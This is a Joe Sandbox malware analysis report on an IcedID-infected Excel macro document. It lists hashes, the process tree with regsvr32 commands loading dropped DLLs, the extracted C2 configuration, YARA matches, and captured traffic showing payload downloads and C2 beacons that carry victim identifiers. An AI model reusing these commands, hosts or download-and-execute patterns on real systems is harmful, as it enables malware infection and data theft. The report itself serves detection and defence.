Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Outfordelivery799862.xlsm

Overview

General Information

Sample Name:Outfordelivery799862.xlsm
Analysis ID:444688
MD5:2f26b7de4c1dcf7c296eb0c9770648fc
SHA1:02e0f149bdb25fbff91f37f49db1bf97962a9247
SHA256:f7d6120e9efa0d813fb8916b1651a39b6301f3b6cc4734a531f4d98b35df38a9
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2632 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2408 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3068 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2296 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2129614420.0000000000190000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000004.00000002.2122390386.00000000001A0000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.regsvr32.exe.130000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          5.2.regsvr32.exe.190000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          5.2.regsvr32.exe.190000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x1bc6:$internal_name: loader_dll_64.dll
          • 0x1f16:$string6: WINHTTP.dll
          • 0x1bea:$string7: DllRegisterServer
          • 0x1bfc:$string8: PluginInit
          3.2.regsvr32.exe.130000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x1bc6:$internal_name: loader_dll_64.dll
          • 0x1f16:$string6: WINHTTP.dll
          • 0x1bea:$string7: DllRegisterServer
          • 0x1bfc:$string8: PluginInit
          4.2.regsvr32.exe.200000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30bc:$string0: _gat=
          • 0x311c:$string1: _ga=
          • 0x30f4:$string2: _gid=
          • 0x30d4:$string3: _u=
          • 0x302e:$string4: _io=
          • 0x30e0:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3088:$string9: POST
          • 0x3148:$string10: aws.amazon.com
          Click to see the 4 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2632, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2408

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 4.2.regsvr32.exe.200000.1.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2112727320.00000000001F7000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2408, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2296, type: MEMORY
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to behavior
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
          Document exploit detected (UrlDownloadToFile)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
          Source: global trafficDNS query: name: thousandsyears.download
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: astrocycle.download
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:17:29 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4879Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=i0kzsemsL1TC8MB6uCpUwDzwGX0%2FKAbNmMgbh1aDEsuXNVR3mdO19j2dvEAu8BDtRshDIvrDCcOwF7MA29XgX%2FqaTyP9YQhEA%2Bit%2B4JyNFuvbBxjkydL8XgvPwc7BZHkh0NqS4g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a91d1289044e3d-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:17:29 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4878Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=F4JnMbyIZ4oVgBLAZzFUjnbaoPbWp6MTsRFAiSjlHmVjsW4crOwB9Qtqa39C1CgY0n7cwXYW%2FRX1B4ejCGWhxziAOZluAHqVAB6Omf%2F8PPeRkKDb4JfI0TLvaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a91d13dc1d2c22-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:17:29 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4877Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=iX9yblW0mmu%2BBPHi%2FzXvtGYEd5r%2FSHAy585QhglT14%2BlgJho6MNNRiF2H%2FkAJPMuKASib%2BW6D8mZAm7vxYQ3HFTsYtjND%2Besj0W8NQ1pDcKeJGGEMQ67oP2hbp8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a91d154ea32c2a-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5681:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:42443446333133363232433331384537; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5686:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=323130393739:416C627573:42414646354341413330314338363736; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5689:52; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:45324139433039303530354537464245; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\559C21BC.pngJump to behavior
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5681:53; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:42443446333133363232433331384537; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5686:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=323130393739:416C627573:42414646354341413330314338363736; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5689:52; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:45324139433039303530354537464245; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com 